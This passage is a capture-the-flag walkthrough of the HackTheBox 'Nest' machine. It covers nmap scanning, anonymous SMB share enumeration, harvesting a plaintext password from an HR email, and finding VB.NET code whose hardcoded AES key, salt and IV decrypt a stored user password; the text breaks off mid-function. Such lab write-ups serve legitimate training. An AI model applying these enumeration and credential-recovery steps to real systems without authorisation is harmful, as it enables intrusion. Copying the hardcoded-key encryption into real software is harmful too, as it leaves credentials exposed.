HackTheBox - Nest 🕊️🐣

HackTheBox-Nest


Quick Summary

→ This machine is really awesome because it has a lot of enumeration especially on SMBClient side. you need a strong knowledge of active directory. Rated as easy machine but other says it is medium box because there is a debugging mode that beginner players have some trouble with it. But unlike other machine’ this one I don’t have a proper shell.


Penetration Testing Methodologies

  1. Network Scanning

    → Nmap scan

    → discover open ports and what services are running

  2. Enumeration

    → Service enumeration

    → Enumeration smb shares

    → In this phase there was a lot of SMB Enumeration’ different files has discovered inside

    → Analyzing the retrived content, some interesting at file RU_Config.xml and config.xml

  3. Post - Exploitation

    → Analyze how the decrypting of password works `

    → Decrypting the password with `dotnetfiddle

    → running the script will give the password for user

  4. Exploitation

    → Enumeration C.Smith user

    → Login as C.Smith with SMB

    → finally got the user.txt

  5. Privilege Escalation

    → I initially came across the Debug Mode Password.txt

    HQK Reporting Service v1.2 service running on port 4386

    → Enumerate HQK Reporting Service v1.2 with telnet and this will give a lot of informatio

    → get and execute the .exe file – HqkLdap.exe will give the Administrator password

    → Finally get the root.txt flag but with SMB Client


Network Scanning

Walkthrough

→ I always begin at NMAP to look on the services what is running. I always use


  • -sV ⇒ Probe open ports to determine service/version info
  • -sC ⇒ equivalent to —script=default
  • -A- ⇒ Agressive scan
  • -oN ⇒ to save our scan results to a text file

# bash

nmap -sV -sC -A 10.10.10.178 -oN nmap-Nest


# bash

root in ~/htb/Nest
❯ nmap -sV -sC -A 10.10.10.178 -oN nmap-Nest
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 08:26 PST
Nmap scan report for 10.10.10.178
Host is up (0.21s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista:icrosoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 Rndows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 o1%), Microsoft Windows Embedded Standard 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
4386/tcp open unknown
[snip]
| Help:
| Reporting Service V1.2
| This service allows users to run queries against databases using the legacy HQK format
| AVAILABLE COMMANDS ---
| LIST
| SETDIR <Directory_Name>
| RUNQUERY <Query_ID>
| DEBUG <Password>
|_ HELP <Command>
[snip]
Host script results:
|_clock-skew: 2m26s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-22T00:29:42
|_ start_date: 2020-03-21T23:00:50

TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 223.12 ms 10.10.14.1
2 223.23 ms 10.10.10.178

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.08 seconds

root in ~/htb/Nest took 1m52s



Nmap results

So there’s only 2 port open.

  • 445 ⇒ which is SMB Client
  • 4386 ⇒ this port is unknow. but in nmap results it has a service of HQK Service

Enumeration

Since TCP/445 is open, we can take a look to see what shares are available:

# bash

root in htb/boxes/Nest
❯ smbclient -L \\\\10.10.10.178
Enter WORKGROUP\root's password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
SMB1 disabled -- no workgroup available

root in htb/boxes/Nest


The Data share seems to be accessible anonymously. We can recursively list the contents of the share with smbclient so :

# bash

root in htb/boxes/Nest
❯ smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
. D 0 Thu Aug 8 06:53:46 2019
.. D 0 Thu Aug 8 06:53:46 2019
IT D 0 Thu Aug 8 06:58:07 2019
Production D 0 Tue Aug 6 05:53:38 2019
Reports D 0 Tue Aug 6 05:53:44 2019
Shared D 0 Thu Aug 8 03:07:51 2019

\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

\Production
NT_STATUS_ACCESS_DENIED listing \Production\*

\Reports
NT_STATUS_ACCESS_DENIED listing \Reports\*

\Shared
. D 0 Thu Aug 8 03:07:51 2019
.. D 0 Thu Aug 8 03:07:51 2019
Maintenance D 0 Thu Aug 8 03:07:32 2019
Templates D 0 Thu Aug 8 03:08:07 2019

\Shared\Maintenance
. D 0 Thu Aug 8 03:07:32 2019
.. D 0 Thu Aug 8 03:07:32 2019
Maintenance Alerts.txt A 48 Tue Aug 6 07:01:44 2019

\Shared\Templates
. D 0 Thu Aug 8 03:08:07 2019
.. D 0 Thu Aug 8 03:08:07 2019
HR D 0 Thu Aug 8 03:08:01 2019
Marketing D 0 Thu Aug 8 03:08:06 2019

\Shared\Templates\HR
. D 0 Thu Aug 8 03:08:01 2019
.. D 0 Thu Aug 8 03:08:01 2019
Welcome Email.txt A 425 Thu Aug 8 06:55:36 2019

\Shared\Templates\Marketing
. D 0 Thu Aug 8 03:08:06 2019
.. D 0 Thu Aug 8 03:08:06 2019
smb: \>




smb: \> cd \Shared\Templates\HR
smb: \Shared\Templates\HR\> ls
. D 0 Thu Aug 8 03:08:01 2019
.. D 0 Thu Aug 8 03:08:01 2019
Welcome Email.txt A 425 Thu Aug 8 06:55:36 2019

10485247 blocks of size 4096. 6543883 blocks available

smb: \Shared\Templates\HR\>

To easily listed all the directory i use the command recurse on, and as you can see’ there was a potential files which is the Maintenance Alerts.txt and Welcome Email.txt. I download it with smbclient :

# bash

smb: \Shared\Templates\HR\> mget "Welcome Email.txt"
Get file Welcome Email.txt? y
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \Shared\Templates\HR\>

Then let’s read the what’s the content of .txt file :

# bash

root in htb/boxes/Nest
cat 'Welcome Email.txt'
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019


Thank you
HR
root in htb/boxes/Nest


Next is the Maintenance Alerts.txt

# bash

Current directory is \Shared\Templates\HR\
smb: \Shared\Templates\HR\> cd /
smb: \> cd \Shared\Maintenance
smb: \Shared\Maintenance\> ls
. D 0 Thu Aug 8 03:07:32 2019
.. D 0 Thu Aug 8 03:07:32 2019
Maintenance Alerts.txt A 48 Tue Aug 6 07:01:44 2019

10485247 blocks of size 4096. 6543883 blocks available
smb: \Shared\Maintenance\> mget "Maintenance Alerts.txt"
Get file Maintenance Alerts.txt? y
getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Shared\Maintenance\>

Then read the content :

# bash

root in htb/boxes/Nest
cat 'Maintenance Alerts.txt'
There is currently no scheduled maintenance work
root in htb/boxes/Nest


Not much interesting so let’s move another phase.

Enumerating SMB Shares

The Welcome Email.txt give us credentials of TempUser. so I’ll try it to smbclient then let’s see if gives us any further access to the Data share so :

# bash

root in htb/boxes/Nest
❯ smbclient \\\\10.10.10.178\\Data -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
. D 0 Thu Aug 8 06:53:46 2019
.. D 0 Thu Aug 8 06:53:46 2019
IT D 0 Thu Aug 8 06:58:07 2019
Production D 0 Tue Aug 6 05:53:38 2019
Reports D 0 Tue Aug 6 05:53:44 2019
Shared D 0 Thu Aug 8 03:07:51 2019

\IT
. D 0 Thu Aug 8 06:58:07 2019
.. D 0 Thu Aug 8 06:58:07 2019
Archive D 0 Tue Aug 6 06:33:58 2019
Configs D 0 Thu Aug 8 06:59:34 2019
Installs D 0 Thu Aug 8 06:08:30 2019
Reports D 0 Sun Jan 26 08:09:13 2020
Tools D 0 Tue Aug 6 06:33:43 2019

\Production
. D 0 Tue Aug 6 05:53:38 2019
.. D 0 Tue Aug 6 05:53:38 2019

\Reports
. D 0 Tue Aug 6 05:53:44 2019
.. D 0 Tue Aug 6 05:53:44 2019

\Shared
. D 0 Thu Aug 8 03:07:51 2019
.. D 0 Thu Aug 8 03:07:51 2019
Maintenance D 0 Thu Aug 8 03:07:32 2019
Templates D 0 Thu Aug 8 03:08:07 2019

\IT\Archive
. D 0 Tue Aug 6 06:33:58 2019
.. D 0 Tue Aug 6 06:33:58 2019

\IT\Configs
. D 0 Thu Aug 8 06:59:34 2019
.. D 0 Thu Aug 8 06:59:34 2019
Adobe D 0 Thu Aug 8 03:20:09 2019
Atlas D 0 Tue Aug 6 19:16:18 2019
DLink D 0 Tue Aug 6 21:25:27 2019
Microsoft D 0 Thu Aug 8 03:23:26 2019
NotepadPlusPlus D 0 Thu Aug 8 03:31:37 2019
RU Scanner D 0 Thu Aug 8 04:01:13 2019
Server Manager D 0 Tue Aug 6 21:25:19 2019

\IT\Installs
. D 0 Thu Aug 8 06:08:30 2019
.. D 0 Thu Aug 8 06:08:30 2019

\IT\Reports
. D 0 Sun Jan 26 08:09:13 2020
.. D 0 Sun Jan 26 08:09:13 2020

\IT\Tools
. D 0 Tue Aug 6 06:33:43 2019
.. D 0 Tue Aug 6 06:33:43 2019

\Shared\Maintenance
. D 0 Thu Aug 8 03:07:32 2019
.. D 0 Thu Aug 8 03:07:32 2019
Maintenance Alerts.txt A 48 Tue Aug 6 07:01:44 2019

\Shared\Templates
. D 0 Thu Aug 8 03:08:07 2019
.. D 0 Thu Aug 8 03:08:07 2019
HR D 0 Thu Aug 8 03:08:01 2019
Marketing D 0 Thu Aug 8 03:08:06 2019

\IT\Configs\Adobe
. D 0 Thu Aug 8 03:20:09 2019
.. D 0 Thu Aug 8 03:20:09 2019
editing.xml AH 246 Sat Aug 3 20:58:42 2019
Options.txt A 0 Tue Oct 11 05:11:14 2011
projects.xml A 258 Wed Jan 9 00:30:52 2013
settings.xml A 1274 Thu Aug 8 03:19:12 2019

\IT\Configs\Atlas
. D 0 Tue Aug 6 19:16:18 2019
.. D 0 Tue Aug 6 19:16:18 2019
Temp.XML A 1369 Wed Jun 11 15:38:22 2003

\IT\Configs\DLink
. D 0 Tue Aug 6 21:25:27 2019
.. D 0 Tue Aug 6 21:25:27 2019

\IT\Configs\Microsoft
. D 0 Thu Aug 8 03:23:26 2019
.. D 0 Thu Aug 8 03:23:26 2019
Options.xml A 4598 Sun Mar 4 03:24:24 2012

\IT\Configs\NotepadPlusPlus
. D 0 Thu Aug 8 03:31:37 2019
.. D 0 Thu Aug 8 03:31:37 2019
config.xml A 6451 Thu Aug 8 07:01:25 2019
shortcuts.xml A 2108 Thu Aug 8 03:30:27 2019

\IT\Configs\RU Scanner
. D 0 Thu Aug 8 04:01:13 2019
.. D 0 Thu Aug 8 04:01:13 2019
RU_config.xml A 270 Fri Aug 9 03:49:37 2019

\IT\Configs\Server Manager
. D 0 Tue Aug 6 21:25:19 2019
.. D 0 Tue Aug 6 21:25:19 2019

\Shared\Templates\HR
. D 0 Thu Aug 8 03:08:01 2019
.. D 0 Thu Aug 8 03:08:01 2019
Welcome Email.txt A 425 Thu Aug 8 06:55:36 2019

\Shared\Templates\Marketing
. D 0 Thu Aug 8 03:08:06 2019
.. D 0 Thu Aug 8 03:08:06 2019

10485247 blocks of size 4096. 6543883 blocks available
smb: \>


Looks like we have access to a some files in the IT directory now. I just recursively pull down all the files in the share so :

# bash

root in htb/boxes/Nest
❯ smbget -R smb://10.10.10.178/Data/ -U TempUser
Password for [TempUser] connecting to //Data/10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Data//IT/Configs/Adobe/editing.xml
smb://10.10.10.178/Data//IT/Configs/Adobe/Options.txt
smb://10.10.10.178/Data//IT/Configs/Adobe/projects.xml
smb://10.10.10.178/Data//IT/Configs/Adobe/settings.xml
smb://10.10.10.178/Data//IT/Configs/Atlas/Temp.XML
smb://10.10.10.178/Data//IT/Configs/Microsoft/Options.xml
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/config.xml
smb://10.10.10.178/Data//IT/Configs/NotepadPlusPlus/shortcuts.xml
smb://10.10.10.178/Data//IT/Configs/RU Scanner/RU_config.xml
smb://10.10.10.178/Data//Shared/Maintenance/Maintenance Alerts.txt
smb://10.10.10.178/Data//Shared/Templates/HR/Welcome Email.txt
Downloaded 16.65kB in 95 seconds

root in htb/boxes/Nest took 1m34s
ls
IT 'Maintenance Alerts.txt' nmap-Nest Production Reports Shared 'Welcome Email.txt'

root in htb/boxes/Nest


When I enumerate all the files 1 by 1 on my operating system i found interesting stuff – RU_Config.xml and config.xml inside this directory /IT/Configs/RU Scanner/RU_Config.xml

# bash

root in htb/boxes/Nest
cd IT/Configs/

root in Nest/IT/Configs
ls
Adobe Atlas DLink Microsoft NotepadPlusPlus 'RU Scanner' 'Server Manager'

root in Nest/IT/Configs
cd 'RU Scanner'/

root in IT/Configs/RU Scanner
ls
RU_config.xml

root in IT/Configs/RU Scanner


and this the content of xml file I got :

# bash

root in IT/Configs/RU Scanner
cat RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
root in IT/Configs/RU Scanner


I thought I would use it to try authenticating to the SMB shares but its Authenticaition failed, So i think the password is encrypted’ leading me to suspect that the password needs to be decrypted.

Next the config.xml

# bash

root in IT/Configs/NotepadPlusPlus
cat config.xml
<?xml version="1.0" encoding="Windows-1252" ?>
<NotepadPlus>
<GUIConfigs>
<!-- 3 status : "large", "small" or "hide"-->
<GUIConfig name="ToolBar" visible="yes">standard</GUIConfig>
<!-- 2 status : "show" or "hide"-->
<GUIConfig name="StatusBar">show</GUIConfig>
<!-- For all attributs, 2 status : "yes" or "no"-->
<GUIConfig name="TabBar" dragAndDrop="yes" drawTopBar="yes" drawInactiveTab="yes" reduce="yes" closeButton="no" doubleClick2Close="no" vertical="no" multiLine="no" hide="no" />
<!-- 2 positions : "horizontal" or "vertical"-->
<GUIConfig name="ScintillaViewsSplitter">vertical</GUIConfig>
<!-- For the attribut of position, 2 status : docked or undocked ; 2 status : "show" or "hide" -->
<GUIConfig name="UserDefineDlg" position="undocked">hide</GUIConfig>
<GUIConfig name="TabSetting" size="4" replaceBySpace="no" />
<!--App position-->
<GUIConfig name="AppPosition" x="662" y="95" width="955" height="659" isMaximized="yes" />
<!-- For the primary scintilla view,
2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide"
4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box" -->
<GUIConfig name="ScintillaPrimaryView" lineNumberMargin="show" bookMarkMargin="show" folderMarkStyle="box" indentGuideLine="show" currentLineHilitingShow="show" Wrap="yes" edge="no" edgeNbColumn="100" wrapSymbolShow="hide" zoom="0" whiteSpaceShow="hide" eolShow="hide" lineWrapMethod="aligned" zoom2="0" />
<!-- For the secodary scintilla view,
2 status for Attribut lineNumberMargin, bookMarkMargin, indentGuideLine and currentLineHilitingShow: "show" or "hide"
4 status for Attribut folderMarkStyle : "simple", "arrow", "circle" and "box" -->
<GUIConfig name="Auto-detection">yes</GUIConfig>
<GUIConfig name="CheckHistoryFiles">no</GUIConfig>
<GUIConfig name="TrayIcon">no</GUIConfig>
<GUIConfig name="RememberLastSession">yes</GUIConfig>
<!--
New Document default settings :
format = 0/1/2 -> win/unix/mac
encoding = 0/1/2/3/4/5 -> ANSI/UCS2Big/UCS2small/UTF8/UTF8-BOM
defaultLang = 0/1/2/..

Note 1 : UTF8-BOM -> UTF8 without BOM
Note 2 : for defaultLang :
0 -> L_TXT
1 -> L_PHP
... (see source file)
-->
<GUIConfig name="NewDocDefaultSettings" format="0" encoding="0" lang="0" codepage="-1" openAnsiAsUTF8="no" />
<GUIConfig name="langsExcluded" gr0="0" gr1="0" gr2="0" gr3="0" gr4="0" gr5="0" gr6="0" gr7="0" langMenuCompact="yes" />
<!--
printOption is print colour setting, the following values are possible :
0 : WYSIWYG
1 : Invert colour
2 : B & W
3 : WYSIWYG but without background colour
-->
<GUIConfig name="Print" lineNumber="no" printOption="0" headerLeft="$(FULL_CURRENT_PATH)" headerMiddle="" headerRight="$(LONG_DATE) $(TIME)" headerFontName="IBMPC" headerFontStyle="1" headerFontSize="8" footerLeft="" footerMiddle="-$(CURRENT_PRINTING_PAGE)-" footerRight="" footerFontName="" footerFontStyle="0" footerFontSize="9" margeLeft="0" margeTop="0" margeRight="0" margeBottom="0" />
<!--
Backup Setting :
0 : non backup
1 : simple backup
2 : verbose backup
-->
<GUIConfig name="Backup" action="0" useCustumDir="no" dir="" />
<GUIConfig name="TaskList">yes</GUIConfig>
<GUIConfig name="SaveOpenFileInSameDir">no</GUIConfig>
<GUIConfig name="noUpdate" intervalDays="15" nextUpdateDate="20080426">no</GUIConfig>
<GUIConfig name="MaitainIndent">yes</GUIConfig>
<GUIConfig name="MRU">yes</GUIConfig>
<GUIConfig name="URL">0</GUIConfig>
<GUIConfig name="globalOverride" fg="no" bg="no" font="no" fontSize="no" bold="no" italic="no" underline="no" />
<GUIConfig name="auto-completion" autoCAction="0" triggerFromNbChar="1" funcParams="no" />
<GUIConfig name="sessionExt"></GUIConfig>
<GUIConfig name="SmartHighLight">yes</GUIConfig>
<GUIConfig name="TagsMatchHighLight" TagAttrHighLight="yes" HighLightNonHtmlZone="no">yes</GUIConfig>
<GUIConfig name="MenuBar">show</GUIConfig>
<GUIConfig name="Caret" width="1" blinkRate="250" />
<GUIConfig name="ScintillaGlobalSettings" enableMultiSelection="no" />
<GUIConfig name="openSaveDir" value="0" defaultDirPath="" />
<GUIConfig name="titleBar" short="no" />
<GUIConfig name="DockingManager" leftWidth="200" rightWidth="200" topHeight="200" bottomHeight="266">
<FloatingWindow cont="4" x="39" y="109" width="531" height="364" />
<PluginDlg pluginName="dummy" id="0" curr="3" prev="-1" isVisible="yes" />
<PluginDlg pluginName="NppConverter.dll" id="3" curr="4" prev="0" isVisible="no" />
<ActiveTabs cont="0" activeTab="-1" />
<ActiveTabs cont="1" activeTab="-1" />
<ActiveTabs cont="2" activeTab="-1" />
<ActiveTabs cont="3" activeTab="-1" />
</GUIConfig>
</GUIConfigs>
<!-- The History of opened files list -->
<FindHistory nbMaxFindHistoryPath="10" nbMaxFindHistoryFilter="10" nbMaxFindHistoryFind="10" nbMaxFindHistoryReplace="10" matchWord="no" matchCase="no" wrap="yes" directionDown="yes" fifRecuisive="yes" fifInHiddenFolder="no" dlgAlwaysVisible="no" fifFilterFollowsDoc="no" fifFolderFollowsDoc="no" searchMode="0" transparencyMode="0" transparency="150">
<Find name="text" />
<Find name="txt" />
<Find name="itx" />
<Find name="iTe" />
<Find name="IEND" />
<Find name="redeem" />
<Find name="activa" />
<Find name="activate" />
<Find name="redeem on" />
<Find name="192" />
<Replace name="C_addEvent" />
</FindHistory>
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
</NotepadPlus>

root in IT/Configs/NotepadPlusPlus


Looking at the very bottom of config.xml I see another interesting stuff. Someone was accessing files on the Secure$ share as well as files on the C.Smith user’s desktop.

# bash

<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>


Post Exploitation

Enumerate TempUser

so let’s see if we can access anything in this share as TempUser :

# bash

❯ smbclient \\\\10.10.10.178\\Secure$ -U TempUser
smb: \> recurse on
smb: \> ls
. D 0 Wed Aug 7 19:08:12 2019
.. D 0 Wed Aug 7 19:08:12 2019
Finance D 0 Wed Aug 7 15:40:13 2019
HR D 0 Wed Aug 7 19:08:11 2019
IT D 0 Thu Aug 8 06:59:25 2019
\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*
\HR
NT_STATUS_ACCESS_DENIED listing \HR\*
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*

smb: \>

Interesting; it seems that the TempUser doesn’t have any access to listing the 3 directories. but ultimately I found that the IT\Carl\ folder was indeed listable:

# bash

root in htb/boxes/Nest
❯ smbclient \\\\10.10.10.178\\Secure$ -U TempUser
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> cd IT/Carl
smb: \IT\Carl\> recurse on
smb: \IT\Carl\> ls
. D 0 Thu Aug 8 03:42:14 2019
.. D 0 Thu Aug 8 03:42:14 2019
Docs D 0 Thu Aug 8 03:44:00 2019
Reports D 0 Tue Aug 6 21:45:40 2019
VB Projects D 0 Tue Aug 6 22:41:55 2019

\IT\Carl\Docs
. D 0 Thu Aug 8 03:44:00 2019
.. D 0 Thu Aug 8 03:44:00 2019
ip.txt A 56 Thu Aug 8 03:44:16 2019
mmc.txt A 73 Thu Aug 8 03:43:42 2019

\IT\Carl\Reports
. D 0 Tue Aug 6 21:45:40 2019
.. D 0 Tue Aug 6 21:45:40 2019

\IT\Carl\VB Projects
. D 0 Tue Aug 6 22:41:55 2019
.. D 0 Tue Aug 6 22:41:55 2019
Production D 0 Tue Aug 6 22:07:13 2019
WIP D 0 Tue Aug 6 22:47:41 2019

\IT\Carl\VB Projects\Production
. D 0 Tue Aug 6 22:07:13 2019
.. D 0 Tue Aug 6 22:07:13 2019

\IT\Carl\VB Projects\WIP
. D 0 Tue Aug 6 22:47:41 2019
.. D 0 Tue Aug 6 22:47:41 2019
RU D 0 Fri Aug 9 23:36:45 2019

\IT\Carl\VB Projects\WIP\RU
. D 0 Fri Aug 9 23:36:45 2019
.. D 0 Fri Aug 9 23:36:45 2019
RUScanner D 0 Thu Aug 8 06:05:54 2019
RUScanner.sln A 871 Tue Aug 6 22:45:36 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner
. D 0 Thu Aug 8 06:05:54 2019
.. D 0 Thu Aug 8 06:05:54 2019
bin D 0 Thu Aug 8 04:00:11 2019
ConfigFile.vb A 772 Thu Aug 8 06:05:09 2019
Module1.vb A 279 Thu Aug 8 06:05:44 2019
My Project D 0 Thu Aug 8 04:00:11 2019
obj D 0 Thu Aug 8 04:00:11 2019
RU Scanner.vbproj A 4828 Fri Aug 9 23:37:51 2019
RU Scanner.vbproj.user A 143 Tue Aug 6 20:55:27 2019
SsoIntegration.vb A 133 Thu Aug 8 06:05:58 2019
Utils.vb A 4888 Thu Aug 8 03:49:35 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin
. D 0 Thu Aug 8 04:00:11 2019
.. D 0 Thu Aug 8 04:00:11 2019
Debug D 0 Thu Aug 8 03:59:13 2019
Release D 0 Tue Aug 6 20:55:26 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\My Project
. D 0 Thu Aug 8 04:00:11 2019
.. D 0 Thu Aug 8 04:00:11 2019
Application.Designer.vb A 441 Tue Aug 6 20:55:13 2019
Application.myapp A 481 Tue Aug 6 20:55:13 2019
AssemblyInfo.vb A 1163 Tue Aug 6 20:55:13 2019
Resources.Designer.vb A 2776 Tue Aug 6 20:55:13 2019
Resources.resx A 5612 Tue Aug 6 20:55:13 2019
Settings.Designer.vb A 2989 Tue Aug 6 20:55:13 2019
Settings.settings A 279 Tue Aug 6 20:55:13 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\obj
. D 0 Thu Aug 8 04:00:11 2019
.. D 0 Thu Aug 8 04:00:11 2019
x86 D 0 Thu Aug 8 03:59:18 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Debug
. D 0 Thu Aug 8 03:59:13 2019
.. D 0 Thu Aug 8 03:59:13 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\bin\Release
. D 0 Tue Aug 6 20:55:26 2019
.. D 0 Tue Aug 6 20:55:26 2019

\IT\Carl\VB Projects\WIP\RU\RUScanner\obj\x86
. D 0 Thu Aug 8 03:59:18 2019
.. D 0 Thu Aug 8 03:59:18 2019

10485247 blocks of size 4096. 6544137 blocks available
smb: \IT\Carl\>


Looks like there is some source code written in Visual Basic. SO I use smbget to recursively download the Secure$\IT\Carl directory for further analysis so :

# bash

root in htb/boxes/Nest
❯ smbget -rR smb://10.10.10.178/Secure$/IT/Carl/ -U TempUser
Password for [TempUser] connecting to //Secure$/10.10.10.178:
Using workgroup WORKGROUP, user TempUser
smb://10.10.10.178/Secure$/IT/Carl//Docs/ip.txt
smb://10.10.10.178/Secure$/IT/Carl//Docs/mmc.txt
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/ConfigFile.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Module1.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Application.myapp
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/AssemblyInfo.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Resources.resx
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.Designer.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/My Project/Settings.settings
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/RU Scanner.vbproj.user
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/SsoIntegration.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner/Utils.vb
smb://10.10.10.178/Secure$/IT/Carl//VB Projects/WIP/RU/RUScanner.sln
Downloaded 0b in 12 seconds

root in htb/boxes/Nest 12s


So this is the whole directory I get :

# bash

root in WIP/RU/RUScanner
ls
bin ConfigFile.vb Module1.vb 'My Project' obj 'RU Scanner.vbproj' 'RU Scanner.vbproj.user' SsoIntegration.vb Utils.vb

root in WIP/RU/RUScanner


Looking at the .vb file the Module1.vb was responsible for retrieving the password from RU_config.xml :

# bash

root in WIP/RU/RUScanner
cat Module1.vb
Module Module1

Sub Main()
Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}

End Sub

End Module

root in WIP/RU/RUScanner


And the Utils.vb are responsible for decrypting the password :

# bash

root in WIP/RU/RUScanner
cat Utils.vb
Imports System.Text
Imports System.Security.Cryptography
Public Class Utils

Public Shared Function GetLogFilePath() As String
Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
End Function

Public Shared Function DecryptString(EncryptedString As String) As String
If String.IsNullOrEmpty(EncryptedString) Then
Return String.Empty
Else
Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
End If
End Function

Public Shared Function EncryptString(PlainString As String) As String
If String.IsNullOrEmpty(PlainString) Then
Return String.Empty
Else
Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
End If
End Function

Public Shared Function Encrypt(ByVal plainText As String, _
ByVal passPhrase As String, _
ByVal saltValue As String, _
ByVal passwordIterations As Integer, _
ByVal initVector As String, _
ByVal keySize As Integer) _
As String

Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _
saltValueBytes, _
passwordIterations)
Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider
symmetricKey.Mode = CipherMode.CBC
Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)
Using memoryStream As New IO.MemoryStream()
Using cryptoStream As New CryptoStream(memoryStream, _
encryptor, _
CryptoStreamMode.Write)
cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)
cryptoStream.FlushFinalBlock()
Dim cipherTextBytes As Byte() = memoryStream.ToArray()
memoryStream.Close()
cryptoStream.Close()
Return Convert.ToBase64String(cipherTextBytes)
End Using
End Using
End Function

Public Shared Function Decrypt(ByVal cipherText As String, _
ByVal passPhrase As String, _
ByVal saltValue As String, _
ByVal passwordIterations As Integer, _
ByVal initVector As String, _
ByVal keySize As Integer) _
As String

Dim initVectorBytes As Byte()
